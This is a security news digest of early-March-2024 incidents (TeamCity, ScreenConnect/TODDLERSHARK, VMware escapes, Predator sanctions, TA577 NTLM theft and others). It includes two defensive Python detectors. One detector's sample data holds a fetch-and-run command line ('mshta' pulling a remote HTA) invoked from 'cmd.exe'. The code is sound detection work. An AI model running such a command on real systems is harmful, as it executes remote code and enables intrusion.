05-Mar-24: In Security News Today

Critical Software Supply Chain Bugs in TeamCity

JetBrains has released patches for two vulnerabilities in its TeamCity on-premises CI/CD server: CVE-2024-27198, a critical authentication bypass (CVSS 9.8) that lets an unauthenticated attacker take full administrative control of the server, and CVE-2024-27199, a high-severity path traversal (CVSS 7.3) that permits a limited set of administrative actions without authentication. Rapid7 reported the flaws, and JetBrains advises patching immediately, since a compromised build server is a direct route into everything it builds and signs. Users can update to version 2023.11.4 or, for older releases, apply the targeted security patch plugin.

Exploitation of ConnectWise ScreenConnect Flaws by TODDLERSHARK Malware

North Korean threat actors have exploited the recently disclosed ConnectWise ScreenConnect vulnerabilities to deploy TODDLERSHARK, a malware family that overlaps with the Kimsuky tools BabyShark and ReconShark. The attackers gained access through the exposed ScreenConnect setup wizard and used cmd.exe to launch the VB-based malware. The malware is polymorphic, varying its code and strings between samples to defeat signature matching, and serves as a reconnaissance tool that collects system and user information for the operators. Separately, South Korea's intelligence service reported that North Korean actors breached servers of domestic semiconductor equipment manufacturers, relying on living-off-the-land techniques to avoid detection.
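The intrusion chain above (remote-support agent, then cmd.exe, then a script host pulling the VB payload) is a process-tree pattern a detection engineer can hunt for. The following is an added example, not code from the page or from the report it summarizes: it walks constructed Sysmon-style process-creation events and flags any script host that descends from a shell which in turn descends from a remote-support agent. The binary names in `REMOTE_AGENTS`, `SHELLS` and `SCRIPT_HOSTS`, and the sample events, are this example's assumptions rather than indicators taken from the report.

```python
"""Flag shell-and-script-host chains launched under a remote-support agent.

Added example. EVENTS below are constructed Sysmon-style process-creation
records, not telemetry from the incident. The binary names in REMOTE_AGENTS,
SHELLS and SCRIPT_HOSTS are the author's choices of what to anchor on, not
indicators from the published report.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str


# Anchors for the detection (assumptions, see module docstring).
REMOTE_AGENTS = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: dict, pid: int, limit: int = 16) -> list:
    """Walk parent links from pid upward; stop at unknown parents or loops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def first_index(names: list, wanted: set):
    for i, name in enumerate(names):
        if name in wanted:
            return i
    return None


def find_lotl_chains(events: list) -> list:
    """Return (script_host_pid, [image names from the host up to the root]) for
    every script host whose ancestry contains a shell and, above that shell, a
    remote-support agent. Order matters: agent -> shell -> script host is the
    hands-on-keyboard pattern; a shell above the agent would be an install."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if image_name(e.image) not in SCRIPT_HOSTS:
            continue
        names = [image_name(p.image) for p in ancestry(by_pid, e.pid)]
        parents = names[1:]                     # drop the script host itself
        shell_at = first_index(parents, SHELLS)
        agent_at = first_index(parents, REMOTE_AGENTS)
        if shell_at is not None and agent_at is not None and shell_at < agent_at:
            hits.append((e.pid, names))
    return hits


# Constructed sample: one malicious chain and one benign logon-script chain.
EVENTS = [
    ProcEvent(400, 4, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(1200, 400,
              r"C:\Program Files (x86)\ScreenConnect Client (a1b2)\ScreenConnect.ClientService.exe",
              "ScreenConnect.ClientService.exe"),
    ProcEvent(3300, 1200, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c mshta http://203.0.113.10/update.hta"),
    ProcEvent(3310, 3300, r"C:\Windows\System32\mshta.exe",
              "mshta http://203.0.113.10/update.hta"),
    ProcEvent(2000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(2110, 2100, r"C:\Windows\System32\wscript.exe", "wscript.exe logon.vbs"),
]

if __name__ == "__main__":
    for pid, names in find_lotl_chains(EVENTS):
        print(f"pid {pid}: {' <- '.join(names)}")
```

The ordering check is what keeps the rule quiet: an administrator who opens a command prompt and installs a remote-support client produces shell above agent, which is not flagged, while an operator driving the agent produces agent above shell. Tune the three name sets to the remote-access tools actually deployed in the estate; an agent you do not run is itself worth an alert.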

U.S. Health Department Intervenes in Change Healthcare Hack Crisis

Following a ransomware attack on Change Healthcare, which disrupted medical payments, the U.S. Health and Human Services Department announced measures to alleviate the impact, including relaxing Medicare prescription requirements and considering advance payments for affected healthcare facilities. The attack led to significant financial strain on healthcare providers, prompting governmental and trade body appeals for urgent support. Amidst this crisis, UnitedHealth Group’s Optum has offered loans to impacted providers, highlighting the critical need for enhanced cybersecurity resilience in the healthcare sector.

VMware Patches Critical ESXi Sandbox Escape Flaws

VMware has issued urgent patches for critical flaws in its ESXi, Workstation, Fusion, and Cloud Foundation products. The vulnerabilities allow an attacker with administrative privileges inside a guest virtual machine to break out of the guest and execute code as that VM's VMX process on the host. Two of them, use-after-free bugs in the virtual USB controllers, carry a CVSS score of 9.3 on Workstation and Fusion (8.4 on ESXi, where the VMX process runs sandboxed); the set also includes an out-of-bounds write and an information disclosure issue. The risk prompted VMware to release fixes even for end-of-life products and to publish the removal of all USB controllers from virtual machines as a temporary workaround where patching must wait.

US Sanctions Against Predator Spyware Developers

The US Treasury Department has sanctioned two individuals and five entities linked to the Intellexa Consortium for developing and distributing Predator spyware, which has been used against US officials, journalists, and policy experts. These are the Treasury's first sanctions aimed at a commercial spyware vendor, and they underline the risks such tools pose to national security and human rights. Predator enables covert data extraction and surveillance of a target's phone, including through zero-click attacks that require no interaction from the victim, which is why the action calls for stringent controls on the commercial surveillance market.

American Express Customer Data Exposed in Third-Party Breach

American Express has notified customers that card account numbers, names, and expiration dates were exposed in a breach at a third-party service provider used by numerous merchants. The breach did not affect American Express's own systems; the notice was issued by American Express Travel Related Services Company, the company's card-issuing entity, rather than by a travel division. Users are advised to monitor their accounts for fraudulent activity and to enable notifications in the American Express mobile app.

Compromised ChatGPT Credentials for Sale on Dark Web

Over 225,000 sets of compromised OpenAI ChatGPT credentials were offered for sale on dark web markets between January and October 2023, harvested by information-stealing malware such as LummaC2, Raccoon, and RedLine. The rise is attributed to a growing number of infected devices rather than any weakness at OpenAI, and it coincides with nation-state actors from Russia, North Korea, Iran, and China experimenting with large language models in their operations. Because chat histories can hold proprietary code, internal documents, and credentials, stealer logs from devices with access to public AI services are now a target in their own right, which is a new problem for identity and access management teams.

Cyber Attack: Ukrainian Hackers Breach Russian Ministry of Defense

Hackers from Ukraine’s Main Intelligence Directorate claimed a successful breach of the Russian Ministry of Defense servers, obtaining sensitive documents and identifying high-ranking officials. The attack included exfiltration of encryption software details and secret service documents. These cyber attacks, if verified, would mark significant victories for Ukraine amidst ongoing conflict with Russia.

Warning: Thread Hijacking Attack Targets IT Networks

The threat actor TA577 is sending phishing emails with ZIP attachments whose contents force the recipient's Windows host to authenticate to an attacker-controlled SMB server, leaking NTLMv2 challenge-response hashes that can be cracked offline or relayed for follow-on access. The lure relies on thread hijacking: the messages appear as replies within existing email threads, which raises the chance the attachment is opened. Organizations are advised to block outbound SMB (TCP 445 and 139) to the internet, since the authentication attempt then never reaches the attacker's server.
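Whether that egress block is in place, and which hosts tried to cross it, is something a firewall log answers directly. The following is an added example, not code from the page or from the vendor report: it parses constructed firewall export lines (the key=value format is invented for the snippet; adapt `LOG_RE` to the real export), flags TCP 445/139 connections from internal hosts to external destinations, and separates attempts the firewall allowed from those it denied. The address ranges in `INTERNAL_NETS` and all sample lines are this example's assumptions.

```python
"""Flag outbound SMB from internal hosts to destinations outside the
internal address space.

Added example. LOG_LINES are constructed, in a key=value format invented for
this snippet; adapt LOG_RE to your firewall's export.
"""
import ipaddress
import re

SMB_PORTS = {445, 139}

# "Internal" means the ranges a perimeter firewall should see as inside.
# Listed explicitly rather than via ipaddress.is_private, which also treats
# the documentation ranges used in the sample (203.0.113.0/24,
# 198.51.100.0/24) as non-routable and would hide the hits.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

LOG_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>allow|deny) proto=(?P<proto>\w+) "
    r"src=(?P<src>[\d.]+):(?P<sport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line: str):
    """One record as a dict, or None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def smb_egress_attempts(lines) -> list:
    """Every TCP 445/139 connection from an internal source to an external
    destination, allowed or denied. A denied attempt still matters: the host
    opened something that tried to authenticate to an outside SMB server."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue
        if rec["dport"] not in SMB_PORTS:
            continue
        if is_internal(rec["src"]) and not is_internal(rec["dst"]):
            hits.append(rec)
    return hits


def leaked_count(lines) -> int:
    """Attempts the firewall let through, i.e. where the NTLM exchange could
    have completed and the hash is presumed captured."""
    return sum(1 for rec in smb_egress_attempts(lines) if rec["action"] == "allow")


def hosts_to_triage(lines) -> set:
    """Internal hosts that tried to reach external SMB, whatever the verdict."""
    return {rec["src"] for rec in smb_egress_attempts(lines)}


# Constructed sample: internal file share, two leaks, one blocked retry, noise.
LOG_LINES = [
    "2024-03-04T09:12:01Z action=allow proto=tcp src=10.20.4.15:49811 dst=10.20.0.5:445",
    "2024-03-04T09:12:07Z action=allow proto=tcp src=10.20.4.15:49822 dst=203.0.113.45:445",
    "2024-03-04T09:12:09Z action=allow proto=tcp src=10.20.4.15:49823 dst=203.0.113.45:443",
    "2024-03-04T09:12:10Z action=allow proto=udp src=10.20.4.15:137 dst=203.0.113.45:137",
    "2024-03-04T09:13:30Z action=allow proto=tcp src=10.20.7.90:51002 dst=198.51.100.8:139",
    "2024-03-04T09:14:00Z action=deny proto=tcp src=10.20.4.15:49840 dst=203.0.113.45:445",
    "malformed line here",
]

if __name__ == "__main__":
    for rec in smb_egress_attempts(LOG_LINES):
        print(f"{rec['ts']} {rec['action']:5} {rec['src']} -> {rec['dst']}:{rec['dport']}")
    print("allowed (hash presumed leaked):", leaked_count(LOG_LINES))
    print("hosts to triage:", sorted(hosts_to_triage(LOG_LINES)))
```

Allowed hits are the priority: the NTLMv2 response for that user is in the attacker's hands, so rotate the password and look for relay targets that accept NTLM without signing. Denied hits confirm the block works but still identify a user who opened the attachment, which is where the endpoint investigation starts.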

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.